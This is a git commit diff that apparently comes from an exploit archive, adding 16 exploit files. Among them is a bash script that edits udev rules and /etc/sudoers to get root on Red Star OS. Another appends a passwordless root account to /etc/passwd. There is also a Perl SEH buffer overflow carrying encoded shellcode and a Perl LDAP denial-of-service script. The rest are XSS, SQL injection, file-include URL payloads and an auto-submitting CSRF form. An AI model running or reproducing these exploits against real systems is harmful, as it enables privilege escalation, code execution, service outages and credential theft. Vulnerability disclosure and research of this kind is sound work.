Update: 2015-01-12
16 new exploits
This commit is contained in:
parent
65db7b92d6
commit
755f28d1d9
17 changed files with 302 additions and 0 deletions
16
files.csv
16
files.csv
|
@ -32199,3 +32199,19 @@ id,file,description,date,author,platform,type,port
|
|||
35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
|
||||
35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
|
||||
35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
|
||||
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
|
||||
35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
|
||||
35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
|
||||
35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
|
||||
35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
|
||||
35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
|
||||
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 'history.php' Cross Site Scripting Vulnerability",2011-05-12,"AutoSec Tools",php,webapps,0
|
||||
35756,platforms/php/webapps/35756.txt,"openQRM 4.8 'source_tab' Parameter Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 'scripts.php' Local File Include Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
|
||||
35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 'submitScore.php' Cross Site Scripting Vulnerability",2011-05-16,"John Leitch",php,webapps,0
|
||||
35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0
|
||||
35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 'origurl' Parameter Cross Site Scripting Vulnerability",2011-05-18,"Mesut Timur",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
13
platforms/asp/webapps/35758.txt
Executable file
13
platforms/asp/webapps/35758.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/47874/info
|
||||
|
||||
Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/wd/wdinvite.asp?SID='><script>alert(1)</script>
|
||||
|
||||
https://www.example.com/wd/connect.asp?mode=joinmeeting&uid='><script>alert(1)</script>&sid='><script>alert(1)</script>
|
||||
|
||||
https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>
|
19
platforms/linux/local/35746.sh
Executable file
19
platforms/linux/local/35746.sh
Executable file
|
@ -0,0 +1,19 @@
|
|||
#!/bin/bash -e
|
||||
|
||||
## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
|
||||
## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png
|
||||
|
||||
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
|
||||
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
|
||||
cat <<EOF >/tmp/r00t.sh
|
||||
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
|
||||
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
|
||||
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
|
||||
rm /tmp/r00t.sh
|
||||
EOF
|
||||
chmod +x /tmp/r00t.sh
|
||||
echo "sudo will be available after reboot"
|
||||
sleep 2
|
||||
reboot
|
||||
|
||||
## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6
|
12
platforms/linux/local/35748.txt
Executable file
12
platforms/linux/local/35748.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
|
||||
which can be abused to execute commands on
|
||||
boot. An example exploitation of this vulnerability is shown here
|
||||
https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png
|
||||
|
||||
PoC:
|
||||
|
||||
/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
|
||||
su - root
|
||||
|
||||
|
||||
## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6
|
16
platforms/linux/local/35749.txt
Executable file
16
platforms/linux/local/35749.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
The root user is disabled on Red Star, and it doesn't look like there is a way to enable it.
|
||||
UnFortunately, they left a big security hole: the Software Manager (swmng.app),
|
||||
which runs as root through sudo and will install any RPM package, even if unsigned.
|
||||
|
||||
To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
|
||||
double-click it to open it with the Software Manager, and click through the blue buttons until it’s done.
|
||||
After that, run rootsh to get a root shell.
|
||||
Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things,
|
||||
but disabling it is a matter of running setenforce 0 as root.
|
||||
|
||||
|
||||
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
|
||||
Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm
|
||||
|
||||
|
||||
## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
|
17
platforms/multiple/dos/35753.pl
Executable file
17
platforms/multiple/dos/35753.pl
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/47858/info
|
||||
|
||||
Novell eDirectory and Netware are prone to a denial-of-service vulnerability.
|
||||
|
||||
Remote attackers can exploit this issue to cause a system-wide denial-of-service.
|
||||
|
||||
#!/usr/bin/perl
|
||||
# usage: ./novell.pl 10.0.0.1 0x41424344
|
||||
use IO::Socket::SSL;
|
||||
$socket = new IO::Socket::SSL(Proto=>"tcp",
|
||||
PeerAddr=>$ARGV[0], PeerPort=>636);
|
||||
die "unable to connect to $host:$port ($!)\n" unless $socket;
|
||||
print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
|
||||
"\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
|
||||
close $socket; print "done\n";
|
||||
|
||||
|
14
platforms/multiple/webapps/35743.txt
Executable file
14
platforms/multiple/webapps/35743.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/47845/info
|
||||
|
||||
The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The following versions are affected:
|
||||
|
||||
Flash Tag Cloud For MT 4
|
||||
MT-Cumulus 1.02 and prior versions
|
||||
|
||||
http://www.example.com/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
|
||||
|
||||
http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
|
8
platforms/php/webapps/35745.txt
Executable file
8
platforms/php/webapps/35745.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/47856/info
|
||||
|
||||
The 'com_cbcontact' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
|
||||
http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]
|
10
platforms/php/webapps/35752.txt
Executable file
10
platforms/php/webapps/35752.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/47857/info
|
||||
|
||||
The 'com_docman' component for Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
'com_docman' 1.3 is vulnerable.
|
||||
|
||||
http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi]
|
||||
http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi]
|
9
platforms/php/webapps/35754.txt
Executable file
9
platforms/php/webapps/35754.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47860/info
|
||||
|
||||
allocPSA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
allocPSA 1.7.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E
|
9
platforms/php/webapps/35755.txt
Executable file
9
platforms/php/webapps/35755.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47861/info
|
||||
|
||||
DocMGR is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
DocMGR 1.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{//
|
9
platforms/php/webapps/35756.txt
Executable file
9
platforms/php/webapps/35756.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47865/info
|
||||
|
||||
openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
openQRM 4.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>
|
9
platforms/php/webapps/35757.txt
Executable file
9
platforms/php/webapps/35757.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47870/info
|
||||
|
||||
eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
9
platforms/php/webapps/35759.txt
Executable file
9
platforms/php/webapps/35759.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47877/info
|
||||
|
||||
eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>
|
27
platforms/php/webapps/35760.txt
Executable file
27
platforms/php/webapps/35760.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/47887/info
|
||||
|
||||
PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?month=5"><script>alert('XSS')</script>&year=2011"><sc ript>alert(document.cookie)</script>
|
||||
|
||||
<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
|
||||
<input type="hidden" name="month" value="4">
|
||||
<input type="hidden" name="day" value="27">
|
||||
<input type="hidden" name="year" value="2011">
|
||||
<input type="hidden" name="hour" value="20">
|
||||
<input type="hidden" name="minute" value="00">
|
||||
<input type="hidden" name="title" value="1<script>alert('XSS')</script>">
|
||||
<input type="hidden" name="description" value="descr">
|
||||
<input type="submit" id="btn" name="submit" value="Add Event">
|
||||
</form>
|
||||
<script>
|
||||
document.getElementById('btn').click();
|
||||
</script>
|
||||
|
||||
|
||||
http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.c ookie)</script>
|
||||
|
12
platforms/php/webapps/35761.txt
Executable file
12
platforms/php/webapps/35761.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/47899/info
|
||||
|
||||
TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to TWiki 5.0.2 are vulnerable.
|
||||
|
||||
|
||||
GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E
|
||||
|
||||
GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E
|
93
platforms/windows/remote/35744.pl
Executable file
93
platforms/windows/remote/35744.pl
Executable file
|
@ -0,0 +1,93 @@
|
|||
source: http://www.securityfocus.com/bid/47851/info
|
||||
|
||||
AVS Ringtone Maker is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
|
||||
|
||||
AVS Ringtone Maker 1.6.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
system("cls");
|
||||
sub logo(){
|
||||
print q'
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
1 ______ 0
|
||||
0 .-" "-. 1
|
||||
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
|
||||
0 Algerian HaCker | | > Site : 1337day.com | 1
|
||||
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
|
||||
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
|
||||
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
|
||||
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
|
||||
1 _ ) \_______\__|IIIIII|__/_______________________ 0
|
||||
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
|
||||
1 )_/ \ / 0
|
||||
0 (@ `--------` ? 2011, Inj3ct0r Team 1
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
|
||||
0 AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit 1
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
|
||||
';
|
||||
}
|
||||
logo();
|
||||
###
|
||||
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
|
||||
# Author : KedAns-Dz
|
||||
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
|
||||
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
|
||||
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
|
||||
# Twitter page : twitter.com/kedans
|
||||
# platform : windows
|
||||
# Tested on : Windows XP sp3 FR
|
||||
##
|
||||
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
|
||||
###
|
||||
|
||||
my $junk = "\x41" x 4123 ; # Buffer Junk
|
||||
my $jump = "\xeb\x06\x90\x90"; # Short Jump
|
||||
my $eip = pack("V", 0x00401E3C); # EIP
|
||||
my $seh = pack("V", 0x7C839AC0); # SEH
|
||||
|
||||
# windows/exec - 511 bytes ( http://www.metasploit.com)
|
||||
# Encoder: x86/alpha_mixed
|
||||
# EXITFUNC=seh, CMD=calc.exe
|
||||
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
|
||||
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
|
||||
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
|
||||
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
|
||||
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
|
||||
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
|
||||
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
|
||||
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
|
||||
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
|
||||
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
|
||||
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
|
||||
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
|
||||
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
|
||||
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
|
||||
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
|
||||
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
|
||||
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
|
||||
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
|
||||
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
|
||||
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
|
||||
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
|
||||
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
|
||||
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
|
||||
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
|
||||
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
|
||||
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
|
||||
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
|
||||
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
|
||||
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
|
||||
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
|
||||
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
|
||||
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
|
||||
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
|
||||
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
|
||||
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
|
||||
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
|
||||
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
|
||||
"\x68\x50\x65\x47\x70\x41\x41";
|
||||
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
|
||||
open (FILE ,'> KedAns.wav');
|
||||
print FILE $exploit;
|
Loading…
Add table
Reference in a new issue